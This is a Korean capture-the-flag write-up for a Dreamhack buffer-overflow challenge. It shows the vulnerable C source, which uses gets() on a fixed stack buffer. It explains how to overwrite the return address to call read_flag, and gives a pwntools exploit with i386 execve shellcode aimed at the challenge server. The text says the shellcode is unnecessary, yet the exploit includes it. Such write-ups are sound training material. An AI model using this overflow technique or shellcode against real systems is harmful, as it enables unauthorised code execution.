[Pwnable] Basic_exploitation_001

1. Environment

Ubuntu 16.04
Arch:     i386-32-little
RELRO:    No RELRO
Stack:    No canary found
NX:       NX enabled
PIE:      No PIE (0x8048000)

2. Code

#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>


void alarm_handler() {
    puts("TIME OUT");
    exit(-1);
}


void initialize() {
    setvbuf(stdin, NULL, _IONBF, 0);
    setvbuf(stdout, NULL, _IONBF, 0);
    signal(SIGALRM, alarm_handler);
    alarm(30);
}


void read_flag() {
    system("cat /flag");
}

int main(int argc, char *argv[]) {

    char buf[0x80];
    initialize();
    gets(buf);
    return 0;
}

3. Write Up

코드를 보면 read_flag 주소를 호출해서 system call을 하는 것이 목적인 듯 보인다.

여기서는 gets 함수로 buf를 읽는데 바이트 제한을 두지 않기 때문에 BoF 가 발생하게 된다.

1. buf에 더미값 입력하기
2. ret 에 read_flag 호출 주소 입력하기

(000 문제랑 순서가 바뀐 거 같은..)

gdb를 이용해서 read_flag 주소만 알아내고 더미값 + ret(read_flag)만 입력하면 바로 플래그 출력

쉘코드도 필요없고 코드를 보면 read_flag 주소를 호출해서 system call을 하는 것이 목적인 듯 보인다.

 

* Exploit Code

from pwn import *

p = remote("host3.dreamhack.games", 9228)

shellcode = b"\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x31\xc9\x31\xd2\xb0\x08\x40\x40\x40\xcd\x80"
#26바이트

#p.recvuntil("(")
#buf_add = int(p.recv(10), 16)

ret_add = 0x080485b9

payload = shellcode + b'\x41' * 106 + p32(ret_add)

p.sendline(payload)
p.interactive()